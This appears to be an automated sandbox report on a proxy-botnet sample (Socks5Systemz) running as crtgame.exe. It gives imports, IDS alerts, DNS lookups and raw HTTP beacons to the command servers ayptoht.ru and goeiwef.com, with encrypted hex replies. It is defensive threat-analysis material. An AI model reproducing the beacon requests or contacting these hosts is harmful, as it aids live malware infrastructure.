                                                                                          kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                          user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                          comctl32.dllInitCommonControls
                                                                                          advapi32.dllAdjustTokenPrivileges
                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          DutchNetherlands
                                                                                          EnglishUnited States
                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-12-14T20:08:04.972631+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54978894.232.249.18780TCP
                                                                                          2024-12-14T20:08:04.972631+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54978894.232.249.18780TCP
                                                                                          2024-12-14T20:08:18.112716+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54981894.232.249.18780TCP
                                                                                          2024-12-14T20:08:18.112716+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54981894.232.249.18780TCP
                                                                                          2024-12-14T20:08:31.253208+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.54984894.232.249.18780TCP
                                                                                          2024-12-14T20:08:31.253208+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.54984894.232.249.18780TCP
                                                                                          2024-12-14T20:08:50.004899+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549904185.237.206.12980TCP
                                                                                          2024-12-14T20:08:50.004899+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549904185.237.206.12980TCP
                                                                                          2024-12-14T20:08:53.823630+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549904185.237.206.12980TCP
                                                                                          2024-12-14T20:08:53.823630+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549904185.237.206.12980TCP
                                                                                          2024-12-14T20:08:55.343124+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549920185.237.206.12980TCP
                                                                                          2024-12-14T20:08:55.343124+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549920185.237.206.12980TCP
                                                                                          2024-12-14T20:08:56.958667+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549923185.237.206.12980TCP
                                                                                          2024-12-14T20:08:56.958667+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549923185.237.206.12980TCP
                                                                                          2024-12-14T20:08:58.465548+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549929185.237.206.12980TCP
                                                                                          2024-12-14T20:08:58.465548+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549929185.237.206.12980TCP
                                                                                          2024-12-14T20:08:59.978702+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549934185.237.206.12980TCP
                                                                                          2024-12-14T20:08:59.978702+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549934185.237.206.12980TCP
                                                                                          2024-12-14T20:09:01.494245+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549936185.237.206.12980TCP
                                                                                          2024-12-14T20:09:01.494245+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549936185.237.206.12980TCP
                                                                                          2024-12-14T20:09:03.069320+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549942185.237.206.12980TCP
                                                                                          2024-12-14T20:09:03.069320+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549942185.237.206.12980TCP
                                                                                          2024-12-14T20:09:04.592642+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549947185.237.206.12980TCP
                                                                                          2024-12-14T20:09:04.592642+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549947185.237.206.12980TCP
                                                                                          2024-12-14T20:09:06.109041+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549953185.237.206.12980TCP
                                                                                          2024-12-14T20:09:06.109041+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549953185.237.206.12980TCP
                                                                                          2024-12-14T20:09:07.633464+01002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549955185.237.206.12980TCP
                                                                                          2024-12-14T20:09:07.633464+01002049468ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M21192.168.2.549955185.237.206.12980TCP
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 14, 2024 20:07:56.837248087 CET4978880192.168.2.594.232.249.187
                                                                                          Dec 14, 2024 20:07:56.957468987 CET804978894.232.249.187192.168.2.5
                                                                                          Dec 14, 2024 20:07:56.957603931 CET4978880192.168.2.594.232.249.187
                                                                                          Dec 14, 2024 20:07:56.957845926 CET4978880192.168.2.594.232.249.187
                                                                                          Dec 14, 2024 20:07:57.077624083 CET804978894.232.249.187192.168.2.5
                                                                                          Dec 14, 2024 20:08:04.972630978 CET4978880192.168.2.594.232.249.187
                                                                                          Dec 14, 2024 20:08:09.988815069 CET4981880192.168.2.594.232.249.187
                                                                                          Dec 14, 2024 20:08:10.109642982 CET804981894.232.249.187192.168.2.5
                                                                                          Dec 14, 2024 20:08:10.109762907 CET4981880192.168.2.594.232.249.187
                                                                                          Dec 14, 2024 20:08:10.109920025 CET4981880192.168.2.594.232.249.187
                                                                                          Dec 14, 2024 20:08:10.229753971 CET804981894.232.249.187192.168.2.5
                                                                                          Dec 14, 2024 20:08:18.112715960 CET4981880192.168.2.594.232.249.187
                                                                                          Dec 14, 2024 20:08:23.128746033 CET4984880192.168.2.594.232.249.187
                                                                                          Dec 14, 2024 20:08:23.249819040 CET804984894.232.249.187192.168.2.5
                                                                                          Dec 14, 2024 20:08:23.249932051 CET4984880192.168.2.594.232.249.187
                                                                                          Dec 14, 2024 20:08:23.250157118 CET4984880192.168.2.594.232.249.187
                                                                                          Dec 14, 2024 20:08:23.371263981 CET804984894.232.249.187192.168.2.5
                                                                                          Dec 14, 2024 20:08:31.253207922 CET4984880192.168.2.594.232.249.187
                                                                                          Dec 14, 2024 20:08:48.603487968 CET4990480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:48.724409103 CET8049904185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:48.724518061 CET4990480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:48.766771078 CET4990480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:48.887721062 CET8049904185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:50.004769087 CET8049904185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:50.004899025 CET4990480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:50.006320000 CET499092023192.168.2.546.8.225.74
                                                                                          Dec 14, 2024 20:08:50.126918077 CET20234990946.8.225.74192.168.2.5
                                                                                          Dec 14, 2024 20:08:50.127011061 CET499092023192.168.2.546.8.225.74
                                                                                          Dec 14, 2024 20:08:50.127104998 CET499092023192.168.2.546.8.225.74
                                                                                          Dec 14, 2024 20:08:50.354110956 CET20234990946.8.225.74192.168.2.5
                                                                                          Dec 14, 2024 20:08:50.357831001 CET499092023192.168.2.546.8.225.74
                                                                                          Dec 14, 2024 20:08:50.477662086 CET20234990946.8.225.74192.168.2.5
                                                                                          Dec 14, 2024 20:08:51.388073921 CET20234990946.8.225.74192.168.2.5
                                                                                          Dec 14, 2024 20:08:51.440426111 CET499092023192.168.2.546.8.225.74
                                                                                          Dec 14, 2024 20:08:53.394088030 CET4990480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:53.513950109 CET8049904185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:53.823422909 CET8049904185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:53.823630095 CET4990480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:53.943134069 CET4990480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:53.944592953 CET4992080192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:54.063612938 CET8049904185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:54.063730001 CET4990480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:54.064467907 CET8049920185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:54.064542055 CET4992080192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:54.064778090 CET4992080192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:54.184482098 CET8049920185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:55.343018055 CET8049920185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:55.343123913 CET4992080192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:55.343722105 CET499222023192.168.2.546.8.225.74
                                                                                          Dec 14, 2024 20:08:55.463566065 CET20234992246.8.225.74192.168.2.5
                                                                                          Dec 14, 2024 20:08:55.463670969 CET499222023192.168.2.546.8.225.74
                                                                                          Dec 14, 2024 20:08:55.463728905 CET499222023192.168.2.546.8.225.74
                                                                                          Dec 14, 2024 20:08:55.463773966 CET499222023192.168.2.546.8.225.74
                                                                                          Dec 14, 2024 20:08:55.565819025 CET4992080192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:55.566255093 CET4992380192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:55.583729982 CET20234992246.8.225.74192.168.2.5
                                                                                          Dec 14, 2024 20:08:55.627352953 CET20234992246.8.225.74192.168.2.5
                                                                                          Dec 14, 2024 20:08:55.686477900 CET8049923185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:55.686557055 CET8049920185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:55.686630964 CET4992080192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:55.686702967 CET4992380192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:55.687473059 CET4992380192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:55.807403088 CET8049923185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:56.444269896 CET20234992246.8.225.74192.168.2.5
                                                                                          Dec 14, 2024 20:08:56.444606066 CET499222023192.168.2.546.8.225.74
                                                                                          Dec 14, 2024 20:08:56.958513021 CET8049923185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:56.958667040 CET4992380192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:57.066071033 CET4992380192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:57.066268921 CET4992980192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:57.188824892 CET8049929185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:57.189052105 CET4992980192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:57.189057112 CET8049923185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:57.189357996 CET4992980192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:57.189359903 CET4992380192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:57.311280966 CET8049929185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:58.465342999 CET8049929185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:58.465548038 CET4992980192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:58.581434011 CET4992980192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:58.581774950 CET4993480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:58.701647997 CET8049934185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:58.701688051 CET8049929185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:58.701730013 CET4993480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:58.701762915 CET4992980192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:58.701899052 CET4993480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:08:58.824187994 CET8049934185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:59.978528023 CET8049934185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:08:59.978702068 CET4993480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:00.097601891 CET4993480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:00.098015070 CET4993680192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:00.218019009 CET8049936185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:00.218102932 CET8049934185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:00.218163967 CET4993680192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:00.218194008 CET4993480192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:00.218385935 CET4993680192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:00.389175892 CET8049936185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:01.493968964 CET8049936185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:01.494245052 CET4993680192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:01.615535975 CET4993680192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:01.615984917 CET4994280192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:01.738899946 CET8049936185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:01.738945961 CET8049942185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:01.739053965 CET4994280192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:01.739085913 CET4993680192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:01.739433050 CET4994280192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:01.861011028 CET8049942185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:03.069195032 CET8049942185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:03.069319963 CET4994280192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:03.194134951 CET4994280192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:03.194622993 CET4994780192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:03.314721107 CET8049947185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:03.314795971 CET4994780192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:03.314814091 CET8049942185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:03.314920902 CET4994280192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:03.315077066 CET4994780192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:03.435431004 CET8049947185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:04.592535973 CET8049947185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:04.592642069 CET4994780192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:04.708138943 CET4995380192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:04.708220959 CET4994780192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:04.831106901 CET8049953185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:04.831202984 CET4995380192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:04.831430912 CET8049947185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:04.831980944 CET4994780192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:04.832398891 CET4995380192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:04.952234030 CET8049953185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:06.108906984 CET8049953185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:06.109040976 CET4995380192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:06.224633932 CET4995380192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:06.224633932 CET4995580192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:06.350552082 CET8049955185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:06.350791931 CET8049953185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:06.350821972 CET4995580192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:06.350898981 CET4995380192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:06.351213932 CET4995580192.168.2.5185.237.206.129
                                                                                          Dec 14, 2024 20:09:06.477570057 CET8049955185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:07.633358002 CET8049955185.237.206.129192.168.2.5
                                                                                          Dec 14, 2024 20:09:07.633464098 CET4995580192.168.2.5185.237.206.129
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Dec 14, 2024 20:07:56.542761087 CET5231253192.168.2.581.31.197.38
                                                                                          Dec 14, 2024 20:07:56.782834053 CET535231281.31.197.38192.168.2.5
                                                                                          Dec 14, 2024 20:08:36.269870996 CET5888153192.168.2.5194.49.94.194
                                                                                          Dec 14, 2024 20:08:37.284583092 CET5888153192.168.2.5194.49.94.194
                                                                                          Dec 14, 2024 20:08:38.300178051 CET5888153192.168.2.5194.49.94.194
                                                                                          Dec 14, 2024 20:08:40.300251961 CET5888153192.168.2.5194.49.94.194
                                                                                          Dec 14, 2024 20:08:44.315768957 CET5888153192.168.2.5194.49.94.194
                                                                                          Dec 14, 2024 20:08:48.318428993 CET5863353192.168.2.5152.89.198.214
                                                                                          Dec 14, 2024 20:08:48.597795963 CET5358633152.89.198.214192.168.2.5
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Dec 14, 2024 20:07:56.542761087 CET192.168.2.581.31.197.380x80a4Standard query (0)ayptoht.ruA (IP address)IN (0x0001)false
                                                                                          Dec 14, 2024 20:08:36.269870996 CET192.168.2.5194.49.94.1940xb105Standard query (0)goeiwef.comA (IP address)IN (0x0001)false
                                                                                          Dec 14, 2024 20:08:37.284583092 CET192.168.2.5194.49.94.1940xb105Standard query (0)goeiwef.comA (IP address)IN (0x0001)false
                                                                                          Dec 14, 2024 20:08:38.300178051 CET192.168.2.5194.49.94.1940xb105Standard query (0)goeiwef.comA (IP address)IN (0x0001)false
                                                                                          Dec 14, 2024 20:08:40.300251961 CET192.168.2.5194.49.94.1940xb105Standard query (0)goeiwef.comA (IP address)IN (0x0001)false
                                                                                          Dec 14, 2024 20:08:44.315768957 CET192.168.2.5194.49.94.1940xb105Standard query (0)goeiwef.comA (IP address)IN (0x0001)false
                                                                                          Dec 14, 2024 20:08:48.318428993 CET192.168.2.5152.89.198.2140x2c41Standard query (0)goeiwef.comA (IP address)IN (0x0001)false
                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Dec 14, 2024 20:07:56.782834053 CET81.31.197.38192.168.2.50x80a4No error (0)ayptoht.ru94.232.249.187A (IP address)IN (0x0001)false
                                                                                          Dec 14, 2024 20:08:48.597795963 CET152.89.198.214192.168.2.50x2c41No error (0)goeiwef.com185.237.206.129A (IP address)IN (0x0001)false
                                                                                          • ayptoht.ru
                                                                                          • goeiwef.com
                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.54978894.232.249.187805884C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 14, 2024 20:07:56.957845926 CET294OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1
                                                                                          Host: ayptoht.ru
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.54981894.232.249.187805884C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 14, 2024 20:08:10.109920025 CET294OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1
                                                                                          Host: ayptoht.ru
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.54984894.232.249.187805884C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 14, 2024 20:08:23.250157118 CET294OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1
                                                                                          Host: ayptoht.ru
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.549904185.237.206.129805884C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 14, 2024 20:08:48.766771078 CET295OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:08:50.004769087 CET878INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:08:49 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 32 39 65 0d 0a 64 65 32 66 66 65 39 31 32 63 31 61 35 32 35 39 65 62 32 33 36 34 33 64 36 63 30 32 61 37 35 39 33 63 65 30 30 64 35 34 39 39 35 31 30 65 64 66 65 66 66 36 64 37 66 64 65 33 34 32 38 62 32 30 33 39 33 38 30 33 63 32 64 36 34 37 38 63 30 66 30 35 39 34 32 30 63 65 31 62 65 35 34 39 65 39 62 31 65 38 34 66 39 66 35 34 38 39 33 38 30 31 39 34 33 30 38 32 35 30 39 62 39 36 33 64 32 32 36 63 34 33 61 39 32 30 32 34 37 30 64 64 39 36 36 34 32 66 39 36 38 62 64 61 33 37 34 34 35 33 38 64 64 65 30 63 66 38 31 31 63 65 64 39 35 37 62 61 32 33 32 31 31 64 35 32 64 35 35 64 32 35 64 65 34 31 66 66 33 38 38 61 34 38 34 36 61 65 32 64 65 61 61 65 31 64 39 38 34 36 35 39 61 36 62 36 62 64 38 62 66 35 64 35 62 61 35 36 65 30 66 31 62 34 39 38 64 66 32 36 33 32 38 33 31 32 62 35 32 65 65 38 37 32 30 37 61 34 62 38 36 30 61 65 30 35 64 38 62 64 37 39 39 38 31 34 61 66 63 30 39 61 33 61 35 37 39 65 62 38 64 33 33 32 39 64 65 32 38 33 66 65 31 61 66 64 34 33 64 34 35 37 32 66 63 35 32 61 61 35 39 34 32 [TRUNCATED]
                                                                                          Data Ascii: 29ede2ffe912c1a5259eb23643d6c02a7593ce00d5499510edfeff6d7fde3428b20393803c2d6478c0f059420ce1be549e9b1e84f9f54893801943082509b963d226c43a9202470dd96642f968bda3744538dde0cf811ced957ba23211d52d55d25de41ff388a4846ae2deaae1d984659a6b6bd8bf5d5ba56e0f1b498df26328312b52ee87207a4b860ae05d8bd799814afc09a3a579eb8d3329de283fe1afd43d4572fc52aa5942ddd780e4e5397dbecd8e87a7c4b2131b465f7a6272823a9cd79793a1ae495675b4ba142b6aaf2ce3d3f0d1d225bdb02d8560a57f41b0d3a94f3c574928ad988114937cca4426ee6f1715780eb578106f604439d27cef6b62650ed79c5643567b34bf0f4cd1a2e06c8b78ec3cdeb5a71d8441986013cd4268bc37b1e4260144a899144de9cfa7a3bde889c366f4efd6517b79f660c581fa55cbbb23f0c885febe6030cb3abf8624a250
                                                                                          Dec 14, 2024 20:08:53.394088030 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:08:53.823422909 CET220INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:08:53 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: ede2ff49a2e11370


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.549920185.237.206.129805884C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 14, 2024 20:08:54.064778090 CET303OUTGET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1
                                                                                          Host: goeiwef.com
                                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                          Dec 14, 2024 20:08:55.343018055 CET740INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.20.1
                                                                                          Date: Sat, 14 Dec 2024 19:08:55 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.4.33
                                                                                          Data Raw: 32 31 34 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 66 30 65 35 35 38 32 34 65 30 65 64 39 65 37 61 36 39 32 62 65 61 35 32 63 63 31 36 34 36 61 37 64 35 62 63 66 64 36 35 61 64 63 34 65 34 33 64 32 34 65 39 34 35 39 66 36 34 61 65 39 62 30 65 38 34 66 39 61 35 33 39 64 33 38 30 31 39 33 32 65 38 38 35 30 39 64 38 32 33 65 32 34 37 32 34 32 61 36 32 34 33 65 37 30 63 37 39 65 36 64 32 63 38 38 38 39 64 62 33 65 35 64 35 61 39 31 64 61 30 32 66 38 30 66 63 63 64 62 35 65 61 64 32 35 33 66 31 35 35 37 63 62 35 63 32 31 64 30 35 65 66 61 33 34 39 64 34 34 34 34 62 30 32 39 65 62 62 62 31 62 39 36 35 66 35 32 61 33 62 37 61 33 38 39 66 63 64 66 61 36 34 62 65 32 66 62 62 35 38 36 64 65 32 30 33 38 39 63 31 34 62 39 33 35 65 34 37 35 31 39 61 30 62 39 37 35 61 39 30 62 63 31 62 35 37 62 39 64 30 61 61 62 63 64 38 63 33 39 34 64 39 36 62 64 64 31 32 63 39 37 65 35 38 34 65 32 30 35 66 63 34 33 63 30 35 32 32 63 63 35 33 34 61 63 39 32 32 [TRUNCATED]
